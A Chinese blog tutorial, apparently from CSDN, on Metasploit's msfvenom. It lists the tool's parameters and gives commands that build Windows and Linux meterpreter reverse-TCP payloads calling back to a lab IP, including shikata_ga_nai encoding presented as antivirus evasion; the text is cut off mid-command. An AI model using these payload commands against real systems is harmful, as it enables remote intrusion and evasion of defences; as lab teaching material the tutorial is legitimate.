msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解

本文详细介绍了Metasploit框架的msfvenom工具,用于生成各种平台的payload,如Linux、PHP、Python和Windows。通过使用编码器如-x86/shikata_ga_nai进行免杀处理,并讲解了如何将payload注入到可信进程以提高session存活率。此外,还涵盖了后渗透阶段的命令,如portfwd、清除事件日志、执行应用程序、进程操作、键盘监听、屏幕监控等功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

未经授权禁止任何渗透测试 本次实验都是在本机虚拟机

常见参数

-l, --list 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,…all

-p, --payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的

-f, --format < format> 指定输出格式

-e, --encoder 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload

-a, --arch < architecture> 指定payload的目标架构,例如x86 还是 x64 还是 x86_64

-o, --out < path> 指定创建好的payload的存放位置

-b, --bad-chars < list> 设定规避字符集,指定需要过滤的坏字符。例如:不使用 ‘\x0f’、‘\x00’

-n, --nopsled < length> 为payload预先指定一个NOP滑动长度

-s, --space < length> 设定有效攻击荷载的最大长度,就是文件大小

-i, --iterations < count> 指定payload的编码次数

-c, --add-code < path> 指定一个附加的win32 shellcode文件

-x, --template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行

-v, --var-name < value> 指定一个自定义的变量,以确定输出格式

-t, --timeout 从stdin读取有效负载时等待的秒数(默认为30,0表示禁用)

-h,–help 查看帮助选项

–platform < platform> 指定payload的目标平台

抽离 专职生成对应的payload
在这里插入图片描述
在这里插入图片描述

异或 编码 免杀
在这里插入图片描述

msfvenom -l platforms 支持平台
在这里插入图片描述
在这里插入图片描述

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f exe -o /home/kali/Desktop/test1.exe

在这里插入图片描述

异或编码 -e x86/shikata_ga_nai -i 3 免杀

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f exe -e x86/shikata_ga_nai -i 3 -o /home/kali/Desktop/test2.exe

在这里插入图片描述

linux 生成 payload

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.226.142 lport=
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值